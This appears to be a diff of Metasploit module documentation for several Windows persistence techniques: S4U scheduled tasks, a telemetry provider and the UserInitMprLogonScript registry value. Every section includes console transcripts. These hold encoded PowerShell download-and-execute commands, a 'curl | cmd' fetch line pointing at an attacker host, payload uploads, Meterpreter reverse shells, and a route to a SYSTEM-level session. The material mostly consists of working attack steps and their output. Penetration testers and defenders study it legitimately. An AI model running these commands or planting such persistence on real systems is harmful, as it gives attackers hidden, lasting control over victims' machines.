+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/service_for_user/event) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target is likely exploitable
+[*] Uploading C:\Users\windows\AppData\Local\Temp\lOsbcWHh.exe
+[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\lOsbcWHh.exe
+[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\LAxYVJnmQ.xml
+[+] Persistence task McmPkAnp created successfully
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251227.2649/WINDOWS7_20251227.2649.rc
+
+msf exploit(windows/persistence/service_for_user/event) > 
+```
+
+Start any service, Google Chrome Update Service (gpupdate) causes ~2 shells, this was the Fax service.
+
+```
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49557) at 2025-12-27 07:27:55 -0500
+[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49558) at 2025-12-27 07:27:55 -0500
+[*] Meterpreter session 6 opened (1.1.1.1:4444 -> 2.2.2.2:49561) at 2025-12-27 07:27:57 -0500
+```

documentation/modules/exploit/windows/persistence/service_for_user/lock_unlock.md

@@ -0,0 +1,126 @@
+## Vulnerable Application
+
+Creates a scheduled task that will run using service-for-user (S4U).
+This allows the scheduled task to run even as an unprivileged user
+that is not logged into the device. This will result in lower security
+context, allowing access to local resources only. The module
+requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+This triggers on either a lock or unlock of the workstation.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a user level shell
+3. Do: `use exploit/windows/persistence/service_for_user/lock_unlock`
+4. Do: `set session #`
+5. Do: `run`
+6. Lock or unlock the system
+7. You should eventually get a shell.
+
+## Options
+
+### TRIGGER
+
+Payload trigger method. Defaults to `unlock`, choices are: `lock`, `unlock`
+
+### EXPIRE_TIME
+
+Number of minutes until trigger expires. Defaults to `0`
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### TASK_NAME
+
+The name of task. Random string as default.
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1)
+
+Initial shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 2
+target => 2
+resource (/root/.msf4/msfconsole.rc)> set srvport 8085
+srvport => 8085
+resource (/root/.msf4/msfconsole.rc)> set uripath w2
+uripath => w2
+resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4449
+lport => 4449
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 1.1.1.1:4449 
+[*] Using URL: http://1.1.1.1:8085/w2
+[*] Server started.
+[*] Run the following command on the target machine:
+powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABiAFcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAYgBXAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAYgBXAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBhADMAVwAwAEYAMQB1ADYARABKAHQAMQBuACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADIAMgA4ADoAOAAwADgANQAvAHcAMgAnACkAKQA7AA==
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2    web_delivery - Powershell command length: 3712
+[*] 2.2.2.2    web_delivery - Delivering Payload (3712 bytes)
+[*] Sending stage (230982 bytes) to 2.2.2.2
+
+msf exploit(multi/script/web_delivery) > [*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:49801) at 2025-12-26 16:44:47 -0500
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WINDOWS7
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: windows7\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/lock_unlock 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/lock_unlock) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/lock_unlock) > set session 1
+session => 1
+msf exploit(windows/persistence/service_for_user/lock_unlock) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/service_for_user/lock_unlock) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target is likely exploitable
+[*] Uploading C:\Users\windows\AppData\Local\Temp\gJBmPcpAn.exe
+[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\gJBmPcpAn.exe
+[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\fGMeBGOMRYMUd.xml
+[+] Persistence task oftkeQLa created successfully
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251226.4527/WINDOWS7_20251226.4527.rc
+```
+
+Lock the system, and unlock it
+
+```
+msf exploit(windows/persistence/service_for_user/lock_unlock) > 
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49802) at 2025-12-26 16:45:58 -0500
+```

documentation/modules/exploit/windows/persistence/service_for_user/logon.md

@@ -0,0 +1,120 @@
+## Vulnerable Application
+
+Creates a scheduled task that will run using service-for-user (S4U).
+This allows the scheduled task to run even as an unprivileged user
+that is not logged into the device. This will result in lower security
+context, allowing access to local resources only. The module
+requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+This triggers on event 4101 which validates the Windows license after logon.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a user level shell
+3. Do: `use exploit/windows/persistence/service_for_user/logon`
+4. Do: `set session #`
+5. Do: `run`
+6. Log in to the system
+7. You should eventually get a shell.
+
+## Options
+
+### EXPIRE_TIME
+
+Number of minutes until trigger expires. Defaults to `0`
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default
+
+### TASK_NAME
+
+The name of task. Random string as default.
+
+### Windows 7 (6.1 Build 7601, Service Pack 1)
+
+Initial shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 2
+target => 2
+resource (/root/.msf4/msfconsole.rc)> set srvport 8085
+srvport => 8085
+resource (/root/.msf4/msfconsole.rc)> set uripath w2
+uripath => w2
+resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4449
+lport => 4449
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 1.1.1.1:4449 
+[*] Using URL: http://1.1.1.1:8085/w2
+[*] Server started.
+[*] Run the following command on the target machine:
+powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABmAGwAagBXAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGYAbABqAFcALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABmAGwAagBXAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBnAFgASwBQADcAawBpADIATwBUAFUARQBOACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADIAMgA4ADoAOAAwADgANQAvAHcAMgAnACkAKQA7AA==
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2    web_delivery - Powershell command length: 3694
+[*] 2.2.2.2    web_delivery - Delivering Payload (3694 bytes)
+[*] Sending stage (230982 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:49789) at 2025-12-26 16:23:40 -0500
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WINDOWS7
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: windows7\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/logon
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/logon) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/logon) > set session 1
+session => 1
+msf exploit(windows/persistence/service_for_user/logon) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/service_for_user/logon) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target is likely exploitable
+[*] Uploading C:\Users\windows\AppData\Local\Temp\QmJIhshGLWM.exe
+[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\QmJIhshGLWM.exe
+[*] This triggers on event 4101 which validates the Windows license after logon
+[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\YAIHto.xml
+[+] Persistence task YKgnVyDO created successfully
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251226.2718/WINDOWS7_20251226.2718.rc
+```
+
+Logout and log back in
+
+```
+msf exploit(windows/persistence/service_for_user/logon) > [*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+msf exploit(windows/persistence/service_for_user/logon) > [*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49792) at 2025-12-26 16:29:21 -0500
+```

documentation/modules/exploit/windows/persistence/service_for_user/schedule.md

@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+Creates a scheduled task that will run using service-for-user (S4U).
+This allows the scheduled task to run even as an unprivileged user
+that is not logged into the device. This will result in lower security
+context, allowing access to local resources only. The module
+requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+
+Creates a scheduled task to run the payload ever FREQUENCY minutes for
+the duration of EXPIRE_TIME.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a user level shell
+3. Do: `use exploit/windows/persistence/service_for_user/schedule`
+4. Do: `set session #`
+5. Do: `run`
+6. You should eventually get a shell.
+
+## Options
+
+### FREQUENCY
+
+Frequency in minutes to execute. Defaults to `60`
+
+### EXPIRE_TIME
+
+Number of minutes until trigger expires. Defaults to `0`
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### TASK_NAME
+
+The name of task. Random string as default.
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1)
+
+Initial shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.18
+lhost => 1.1.1.18
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 2
+target => 2
+resource (/root/.msf4/msfconsole.rc)> set srvport 8085
+srvport => 8085
+resource (/root/.msf4/msfconsole.rc)> set uripath w2
+uripath => w2
+resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4449
+lport => 4449
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 1.1.1.18:4449 
+[*] Using URL: http://1.1.1.18:8085/w2
+[*] Server started.
+[*] Run the following command on the target machine:
+powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABtADMAQQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJABtADMAQQAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAG0AMwBBAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBlAFAAVQBlAFUATQBBAHMANAB4AGEAbgByAHkAMQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2    web_delivery - Powershell command length: 3726
+[*] 2.2.2.2    web_delivery - Delivering Payload (3726 bytes)
+[*] Sending stage (230982 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.18:4449 -> 2.2.2.2:49760) at 2025-12-26 15:35:16 -0500
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WINDOWS7
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: windows7\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/schedule 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/schedule) > set frequency 5
+frequency => 5
+msf exploit(windows/persistence/service_for_user/schedule) > set expire_time 7
+expire_time => 7
+msf exploit(windows/persistence/service_for_user/schedule) > set session 1
+session => 1
+msf exploit(windows/persistence/service_for_user/schedule) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/service_for_user/schedule) > rexploit
+[*] Reloading module...
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.18:4444 
+msf exploit(windows/persistence/service_for_user/schedule) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target is likely exploitable
+[*] Uploading C:\Users\windows\AppData\Local\Temp\BruDqCGH.exe
+[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\BruDqCGH.exe
+[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\KSPbcFQO.xml
+[+] Persistence task LVNzSUTTA created successfully
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251226.3810/WINDOWS7_20251226.3810.rc
+
+msf exploit(windows/persistence/service_for_user/schedule) > date
+[*] exec: date
+
+Fri Dec 26 03:38:13 PM EST 2025
+```
+
+Wait
+
+```
+msf exploit(windows/persistence/service_for_user/schedule) > 
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.18:4444 -> 2.2.2.2:49768) at 2025-12-26 15:43:03 -0500
+
+msf exploit(windows/persistence/service_for_user/schedule) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: windows7\windows
+```

documentation/modules/exploit/windows/persistence/telemetry.md

@@ -0,0 +1,148 @@
+## Vulnerable Application
+
+This persistence mechanism installs a new telemetry provider for windows. If telemetry is turned on,
+when the scheduled task launches, it will execute the telemetry provider and execute our payload
+with system permissions.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get an admin level shell on windows
+3. Do: `use exploit/windows/persistence/telemetry`
+4. Do: `set session #`
+5. Do: `run`
+6. You should get a shell when the scheduled task runs.
+
+## Options
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### NAME
+
+Name of the telemetry program. Random string as default.
+
+## Scenarios
+
+### Windows 10 1909 (10.0 Build 18363)
+
+Get an admin level shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450 
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50293) at 2026-01-03 13:12:03 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 1909 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/telemetry 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/telemetry) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/telemetry) > set session 1
+session => 1
+msf exploit(windows/persistence/telemetry) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/telemetry) > 
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Powershell detected on system
+[*] Appraiser name found: Microsoft Compatibility Appraiser
+[+] Next scheduled runtime: 1/4/2026 4:10:25 AM
+[*] Checking registry write access to: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\qIJwhRtzyhRm
+[+] The target is vulnerable. Registry writable
+[+] Writing payload to C:\Users\windows\AppData\Local\Temp\blaWvMM.exe
+[*] Using telemetry id: uYmoknDG
+[+] Persistence installed! Call a shell immediately using 'schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"' (SYSTEM) or CompatTelRunner.exe (user)
+       or wait till 1/4/2026 4:10:25 AM (SYSTEM)
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.2023/WIN10PROLICENSE_20260103.2023.rc
+```
+
+Trigger the scheduled task instead of waiting
+
+```
+msf exploit(windows/persistence/telemetry) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 2344 created.
+Channel 4 created.
+Microsoft Windows [Version 10.0.18363.2274]
+(c) 2019 Microsoft Corporation. All rights reserved.
+
+C:\WINDOWS\system32>schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
+schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
+SUCCESS: Attempted to run the scheduled task "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser".
+
+C:\WINDOWS\system32>exit
+meterpreter > background
+[*] Backgrounding session 1...
+msf exploit(windows/persistence/telemetry) > date
+[*] exec: date
+
+Sat Jan  3 01:30:05 PM EST 2026
+msf exploit(windows/persistence/telemetry) > 
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50305) at 2026-01-03 13:30:51 -0500
+
+msf exploit(windows/persistence/telemetry) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                Connection
+  --  ----  ----                     -----------                                ----------
+  1         meterpreter x64/windows  WIN10PROLICENSE\windows @ WIN10PROLICENSE  1.1.1.1:4450 -> 2.2.2.2:50293 (2.2.2.2)
+  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN10PROLICENSE      1.1.1.1:4444 -> 2.2.2.2:50305 (2.2.2.2)
+```

documentation/modules/exploit/windows/persistence/userinit_mpr_logon_script.md

@@ -0,0 +1,237 @@
+## Vulnerable Application
+### Windows Persistence via HKCU UserInitMprLogonScript
+
+This module establishes persistence by leveraging the per-user registry value:
+
+HKCU\Environment\UserInitMprLogonScript
+
+The module writes a payload executable to disk and sets the
+`UserInitMprLogonScript` value so that the payload executes when the user
+logs in.
+
+Unlike the traditional `Winlogon\Userinit` (HKLM) technique, this method:
+
+* Does not require administrative privileges
+* Does not modify system-wide registry keys
+* Only affects the current user
+* Executes during interactive user logon
+
+The payload will execute when the user signs out and logs back in.
+
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Obtain a meterpreter session on a Windows target (user-level is sufficient)
+3. `use exploit/windows/persistence/userinit_mpr_logon_script`
+4. `set SESSION <id>`
+5. `set LHOST <attacker_ip>`
+6. `set LPORT <attacker_port>`
+7. `run`
+8. Sign out from the Windows session
+9. Log back in
+10. A new meterpreter session should be created
+
+
+
+## Options
+
+### SESSION (Required)
+
+The session to run this module on.
+
+### LHOST (Required)
+
+The local host to receive the reverse connection.
+
+### LPORT (Required)
+
+The local port to receive the reverse connection.
+
+### PAYLOAD_NAME
+
+The filename to use when writing the payload to disk.
+
+If not specified, a random filename will be generated.
+
+
+
+## Scenarios
+
